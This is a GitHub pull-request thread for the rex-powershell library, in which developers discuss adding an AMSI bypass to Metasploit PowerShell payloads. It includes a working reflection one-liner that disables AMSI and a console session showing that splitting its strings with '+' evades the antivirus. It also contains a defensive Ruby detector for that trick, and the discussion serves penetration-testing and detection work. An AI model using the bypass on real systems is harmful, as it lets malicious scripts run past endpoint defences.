rapid7 / rex-powershell

Rex library for dealing with Powershell Scripts

Integrate PowerShell Protections Bypass #17

Closed phra closed 5 years ago

phra commented 5 years ago

Will fix https://github.com/rapid7/metasploit-framework/issues/11283

bwatters-r7 commented 5 years ago

@phra I missed this for a bit, but I'd like to test and land this. Can you give specific examples where our current payloads fail, but this succeeds so we can have some testing benchmarks?

phra commented 5 years ago

@bwatters-r7 just try any PowerShell payloads on an updated Win 10 machine with AMSI.

phra commented 5 years ago

As a reference: https://iwantmore.pizza/posts/amsi.html

timwr commented 5 years ago

Very interesting, thanks @phra

timwr commented 5 years ago

I didn't expect the '+' to work so well:

Microsoft Windows [Version 10.0.17134.523]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\User>powershell.exe
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\User>
>> $Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$Ref.GetField('amsiInitFailed','NonPublic,Stati
c').SetValue($null,$true);
>>
>>
>>
At line:1 char:1
+
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

PS C:\Users\User> $Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');$Ref.GetField('amsiIn'+'itFai
led','NonPublic,Static').SetValue($null,$true);
>>
>>
>>
PS C:\Users\User>
PS C:\Users\User>

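
The session above shows the same reflection one-liner passing once its string literals are split with '+'. From the detection side, the added example below (not code from rex-powershell or from this PR) normalises that concatenation in PowerShell script-block log text before matching the AMSI-related names quoted in the thread; the sample log lines are constructed, and the input format is assumed to be plain script text such as a 4104 event message.

```ruby
# Added example (not part of rex-powershell): undo '+' string-literal
# concatenation ('Ams'+'iUtils' -> 'AmsiUtils') in script-block log text,
# then match the AMSI reflection indicators from the one-liner in the thread.

# Indicator strings taken from the one-liner shown in the PR discussion.
AMSI_INDICATORS = [
  'System.Management.Automation.AmsiUtils',
  'amsiInitFailed',
].freeze

# Join adjacent single-quoted literals concatenated with '+'.
# Repeats until stable so 'a'+'b'+'c' collapses to 'abc'.
def join_string_concats(script)
  joined = script.dup
  loop do
    before = joined
    joined = joined.gsub(/'([^']*)'\s*\+\s*'([^']*)'/) { "'#{$1}#{$2}'" }
    break if joined == before
  end
  joined
end

# Indicators present in a script block after normalisation.
# Case-insensitive, since PowerShell identifiers are case-insensitive.
def amsi_indicators_in(script)
  normalised = join_string_concats(script).downcase
  AMSI_INDICATORS.select { |ind| normalised.include?(ind.downcase) }
end

# Constructed sample script-block text (plain, '+'-split, and benign).
SAMPLE_PLAIN = "$Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');" \
               "$Ref.GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);"
SAMPLE_SPLIT = "$Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');" \
               "$Ref.GetField('amsiIn'+'itFai'+'led','NonPublic,Static').SetValue($null,$true);"
SAMPLE_BENIGN = "Write-Output ('Hello, '+'world')"

if __FILE__ == $0
  [SAMPLE_PLAIN, SAMPLE_SPLIT, SAMPLE_BENIGN].each do |block|
    hits = amsi_indicators_in(block)
    puts "#{hits.empty? ? 'clean' : 'ALERT'} #{hits.inspect}"
  end
end
```

Both the plain and the split form report the same two indicators, while the benign line reports none.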
timwr commented 5 years ago

Thanks @phra. We still need to add this to webdelivery (preferably as an off-by-default option). It would be nice to have the strings obfuscated dynamically, but this will do for now.

phra commented 5 years ago

I didn't expect the '+' to work so well:

It would be nice to have the strings obfuscated dynamically, but this will do for now.

Empire includes https://github.com/danielbohannon/Invoke-Obfuscation, but it depends on PowerShell, and that means adding it as an optional(?) dependency or embedding it directly within the project with a ~50MB overhead of stuff.

Writing a simpler, similar project in Ruby may be overkill.

Any ideas?

0xVIC commented 5 years ago

Another reference:

https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/

phra commented 5 years ago

Was the prepend_protections_bypass option defined somewhere?

I don't see the setting available yet with Framework Version: 5.0.19-dev.

timwr commented 5 years ago

@phra apologies, I didn't send a PR with that part. I think I tested with this commit: https://github.com/timwr/metasploit-framework/commit/a0d6bcd3c1a9763a31d64b822f400493bb4042fc

phra commented 5 years ago

Oh ok, I hope it will be merged into master soon! Regarding the web delivery, it should be enough to prepend the bypass before the delivery script itself when choosing PowerShell as the target.

phra commented 5 years ago

Any update? I still cannot easily add the AMSI bypass to PowerShell payloads.

phra commented 4 years ago

@timwr any update on this?

timwr commented 4 years ago

@phra did you test the commit I posted above? https://github.com/timwr/metasploit-framework/commit/a0d6bcd3c1a9763a31d64b822f400493bb4042fc Maybe you can send a PR to the framework repository that enables it for web_delivery?

phra commented 4 years ago

Maybe you can send a PR to the framework repository that enables it for web_delivery?

@timwr see https://github.com/rapid7/metasploit-framework/pull/12446